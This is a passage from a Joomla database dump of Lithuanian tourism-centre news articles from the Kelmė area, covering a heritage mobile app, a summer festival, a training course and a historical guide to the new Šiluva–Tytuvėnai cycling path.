00:00:00','2020-09-21 20:22:30','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/vienuolyno_paslaptys\\/mian\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',10,0,43,'','',1,1956,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(353,442,'Liepos 6 d. renginiai','liepos-6-d-renginiai','','','\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/liepos6/paroda.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2021-07-01 18:18:59',135,'','2021-07-01 18:22:29',135,0,'0000-00-00 00:00:00','2021-07-01 18:18:59','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/liepos6\\/paroda_main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,0,36,'','',1,1349,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(347,436,'Mobilioji aplikacija - programėlė','mobilioji-aplikacija-programele','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kelmės turizmo ir verslo informacijos centras keliautojams pristato programėlę „Kelmės krašto paveldas“<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Kelmės turizmo ir verslo informacijos centras keliautojams nuo šiol siūlo savo kelionę po Kelmės kraštą planuoti mobiliosios programėlės-aplikacijos pagalba. Joje rasite Centro paruoštą unikalų žiedinį maršrutą,  nekilnojamojo kultūros paveldo objektus bei kitą keliautojui aktualią informaciją.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Sukurta mobilioji programėlė-aplikacija – įgyvendinto Kultūros paveldo departamento prie Kultūros ministerijos projekto rezultatas, kuris leis geriau pažinti Kelmės rajono  ne tik vietos, bet ir kitų rajonų gyventojams  bei užsienio svečiams, nes programėlės tekstai parengti ir anglų bei rusų kalbomis.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Kelmės krašto svečiai norėdami naudotis mobiliąja programėle- aplikacija tūrėtų parsisiųsti ją  iš GooglePlay ar Appstore – Kelmės kraštas.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Programėlė-aplikacija sukurta įgyvendinant projektą „Žiedinis maršrutas: Kelmės rajono paveldas nuo Tytuvėnų iki Kražių“. Projektą dalinai finansavo Kultūros paveldo departamentas prie Kultūros ministerijos</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span><a href=\"https://play.google.com/store/apps/details?id=com.freshgun.kelme\" target=\"_blank\"><img src=\"https://www.infokelme.lt/data/ckfinder/files/android.jpg\" border=\"0\" alt=\"\" width=\"220\" height=\"94\" /></a><span><strong> </strong> </span></span></span></span></span></span></span><a href=\"https://apps.apple.com/ca/app/kelm%C4%97s-kra%C5%A1to-paveldas/id1534841939\" target=\"_blank\" style=\"font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"https://www.infokelme.lt/data/ckfinder/files/app%20store.jpg\" border=\"0\" alt=\"\" width=\"220\" height=\"94\" /></a></p>',1,0,0,44,'2020-12-07 19:45:31',135,'','2020-12-07 20:01:52',135,0,'0000-00-00 00:00:00','2020-12-07 19:45:31','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/mobili_programele\\/apps.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"0\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',13,0,42,'','',1,1824,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(355,444,'XVIII Tytuvėnų vasaros festivalis','xviii-tytuvenu-vasaros-festivalis','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">2021 m. Liepos 18 d. - Rugpjūčio 11 d. </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnai - Kelmė - Šiluva</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/festivalis_2021/tytuvenai_2021.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2021-07-08 21:05:57',135,'','2021-07-08 21:07:33',135,0,'0000-00-00 00:00:00','2021-07-08 21:05:57','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/festivalis_2021\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,34,'','',1,1290,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(348,437,'Parama','parama','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kaip skirti pajamų mokesčio dalį paramai e. būdu?<br /></span></p>\r\n','\r\n<p align=\"center\"><iframe title=\"YouTube video player\" src=\"https://www.youtube.com/embed/7BCPmiMytek\" frameborder=\"0\" width=\"948\" height=\"534\"></iframe></p>',1,0,0,44,'2021-04-15 20:56:24',135,'','2021-04-15 21:02:55',135,0,'0000-00-00 00:00:00','2021-04-15 20:56:24','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/parama_2020\\/parama.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,41,'','',1,1232,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(349,438,'MOKYMAI','piligrimystes-ir-religinio-turizmo-komunikacijos-mokymai','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Balandžio 20-22 d. nuo 10 iki 12 val.  kviečiame turizmo informacijos centrų darbuotojus, verslo atstovus, savivaldybės atstovus bei bendruomenės narius dalyvauti nuotoliniuose mokymuose.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Piligrimystės ir religinio turizmo komunikacijos mokymų tikslas – suteikti žinių ir įgūdžių, kaip pristatyti savo atstovaujamą sritį (lankytiną objektą, kavinę, apgyvendinimo įstaigą ar svečių namus, kt.) ir pakviesti joje apsilankyti piligrimus bei besidominančius religiniu turizmu. Mokymus organizuoja KOG rinkodaros ir komunikacijos mokslų institutas, mokymai vyks nuotoliniu būdu „Zoom“ platformoje. </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Susidomėjusius kviečiame rezervuoti laiką ir registruotis žemiau esančioje nuorodoje!</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Jums užsiregistravus, artimiausiomis dienomis bus atsiųsta detali programa ir nuoroda prisijungimui prie mokymų.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Registruotis į mokymus galite čia: <a href=\"https://survey.alchemer.com/s3/6284795/Registracija\" target=\"_blank\">https://survey.alchemer.com/s3/6284795/Registracija</a></span></p>\r\n<p style=\"text-align: justify;\"><strong><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Dalyvavimas mokymuose nemokamas.</span></strong></p>\r\n<p style=\"text-align: justify;\"><strong><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/mokymai/1.jpg\" border=\"0\" alt=\"\" /></span></strong></p>',1,0,0,44,'2021-04-19 20:16:02',135,'','2021-04-19 20:31:01',135,0,'0000-00-00 00:00:00','2021-04-19 20:16:02','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/mokymai\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',10,0,40,'','',1,1104,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(350,439,'Naujasis dviračių takas!','naujasis-dviraciu-takas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Naujuoju taku Šiluva-Tytuvėnai keliaujant...<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">2020 metais Raseinių krašte atsirado du nauji dviračių takai. Apie dviračių taką Raseiniai-Kalnujai rašyta dar 2020 m. pavasarį (žr. <a href=\"https://cutt.ly/EbQtHre\" target=\"_blank\">https://cutt.ly/EbQtHre</a> ). Šiuo straipsniu norisi apžvelgti ką galima išvysti keliaujant naujuoju taku iš Šiluvos į Tytuvėnus arba atvirkščiai. Takas oficialiai turėjo būti atidarytas tradicinės Tytuvėnų aktyvaus laisvalaikio „Tytuvelo“ šventės metu, tačiau dėl pandemijos atidarymas atšauktas. Nepaisant visų aplinkybių, takas jau pamėgtas ne tik vietinių,  bet ir turistų bei piligrimų. </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Šiluvą ir Tytuvėnus sujungė 8 kilometrų ilgio pėsčiųjų ir dviračių takas, kuris driekiasi per du rajonus – Raseinių ir Kelmės. Be to, takas patenka į Šv. Jokūbo piligrimų kelio Kauno ir Šiaulių atkarpas. Šiluvą ir Tytuvėnus aprašyti šiame straipsnyje būtų keblu, todėl keliautojams susipažinti su šiais miesteliais rekomenduoju internete, VšĮ „Atrask Raseinius“, Šiluvos ar Tytuvėnų piligrimų centruose, bei Tytuvėnų regioninio parko direkcijos lankytojų centre. </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Kelionę siūlau pradėti nuo nepelnytai užmirštos Šiluvos vietos – turgaus aikštės. Seniau ji vadinta rinka, buvo svarbus miestelio ekonomikos „variklis“. Gaila, bet sovietmečiu aikštė „perkirsta“ pusiau, taip ji prarado pirminį stačiakampio išplanavimą. Tiesa, 2012 m. atlikti aikštės rekonstravimo darbai. Šiandien dalyje aikštės matomas senasis grindinys brukas, išlikęs nuo 1935 m. Priminsiu, jog aikštė suformuota XVIII a. Čia vykdavo turgūs, atlaidų metu turgavietė būdavo apstatoma laikinomis medinėmis prekyvietėmis. 1815 m. žydai aikštės pakraštyje pasistatė medinę sinagogą (XX a. vid. nugriauta). Aikštėje vyko ne tik ekonominis, bet ir kultūrinis, politinis gyvenimas. XIX a. buvo platinama nelegali lietuviška spauda, vėliau vyko vaidinimai, gegužinės. Būta ir politinių mitingų. Štai mokslininkas Pranciškus Baltrus Šivickis prisimena 1905 m. gruodį rinkos aikštėje vykus didžiulį mitingą: „Nieko nelaukęs, Karabinas užlipo ant stalo ir pradėjo pasakoti apie Vilniaus Seimą ir jo nutarimus &lt;...&gt;. Jo stiprus balsas buvo girdimas po visą rinką. Publika labai plojo ir rėkė „ura“. Deja, aikštė mini ir skaudžius istorijos įvykius, 1941 m. joje buvo sukurtas getas (vėliau visi Šiluvos žydai sušaudyti), pokariu čia buvo išmetami nukankinti ir nužudyti pasipriešinimo kovų dalyviai. </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/naujuoju_taku/1ok.jpg\" border=\"0\" alt=\"\" /></span></p>\r\n<p style=\"text-align: center;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"> </span><em><strong><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">1. Šiluvos Turgaus aikštė, 1930 m. (dešinėje matoma Šiluvos žydų sinagoga). Nacionalinio M. K. Čiurlionio dailės muziejaus nuotr.</span></strong></em></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Keliaujant link Tytuvėnų, prieš posūkį į Šiaulėnų gatvę jus pasitiks paminklinis akmuo bylojantis apie 1944-45 m. metais vykusius įvykius Lietuvoje, kuomet Lietuvos piliečiai buvo kankinami, žudomi ir tremiami. Ne išimtis ir Šiluva. Akmuo stovi greta dviejų pastatų, kuriose veikė represinės struktūros įvairiais būdais kankinusios ir luošinusios Šiluvos ir apylinkių gyventojus. Akmuo atidengtas 1996 m. </span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span><img src=\"images/stories/naujienos/naujuoju_taku/2ok.jpg\" border=\"0\" alt=\"\" /></span></span></span></span></span></span></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-variant: normal; letter-spacing: normal; line-height: 18px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px; float: none; background-color: #ffffff; display: inline !important;\">2. Paminklinis akmuo okupacinio pasipriešinimo dalyviams, 2020 m. A. Zmitros nuotr. </span></em></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Pajudėję iš Šiluvos naujuoju taku, kairėje kelio pusėje, ties posūkiu į Lyduvėnus, išvysite 2020 m. pastatytą dviejų kryžmių kryžių, kitaip dar vadinamą karavyku. Pavadinimas kildinamas nuo Caravaca miestelio Ispanijoje. Buvo tikima, kad vietovę, kur stovi toks kryžius, Dievas saugo nuo didelių nelaimių – maro, epidemijų, kitų užkrečiamų ligų protrūkio ar audrų. Neretai kryžiai turi Šv. Roko skulptūrėlę ir jo vardą. Šv. Rokas apie XIII a. slaugė maru sergančiuosius, todėl jis laikomas ligonių globėju. Kryžių, pasaulyje siaučiant koronaviruso pandemijai, išskobė ir Šiluvai padovanojo skulptorius tautodailininkas Adolfas Teresius. </span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span><img src=\"images/stories/naujienos/naujuoju_taku/3ok.jpg\" border=\"0\" alt=\"\" /></span></span></span></span></span></span></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-variant: normal; letter-spacing: normal; line-height: 18px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px; float: none; background-color: #ffffff; display: inline !important;\">3. Kryžius karavykas, 2020 m. L. Urbonienės nuotr.</span></em></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Kiek toliau, už puskilometrio, kairėje kelio pusėje atsiveria panorama į senąsias Šiluvos žydų kapines. Jos primena mums apie Šiluvoje gyvenusią žydų bendruomenę, kuri miestelyje kūrėsi nuo XVIII a. Jos dėka suaktyvėjo miestelio ekonominis gyvenimas. Iki šių dienų išlikusios kapinės įkurtos XIX a. pradžioje (seniausias įrašas ant antkapio apie palaidojimą rastas iš 1809 m.) miško pakraštyje, prie kelio Šiluva-Tytuvėnai. Šiose kapinėse ilsisi dauguma Šiluvos žydų, taip pat čia laidoti ir iš aplinkinių vietovių: Tytuvėnų, Žaiginio, Lyduvėnų ir kt. 2017 m. senosios Šiluvos žydų kapinės sutvarkytos JAV organizacijos „Rytų Europos žydų kapinių atkūrimo projektai“ iniciatyva, kapinės išvalytos, apjuostos metaline tvora.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span><img src=\"images/stories/naujienos/naujuoju_taku/4ok.jpg\" border=\"0\" alt=\"\" /></span></span></span></span></span></span></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-variant: normal; letter-spacing: normal; line-height: 18px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px; float: none; background-color: #ffffff; display: inline !important;\">4. Senosios Šiluvos žydų kapinės, 2019 m. VšĮ „Atrask Raseinius“ nuotr.</span></em></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Nutolus nuo Šiluvos Turgaus aikštės 3 kilometrus atidursite tarsi Roglaičių kaimo kryžkelėje, kurią puošia balta koplytėle. Nors 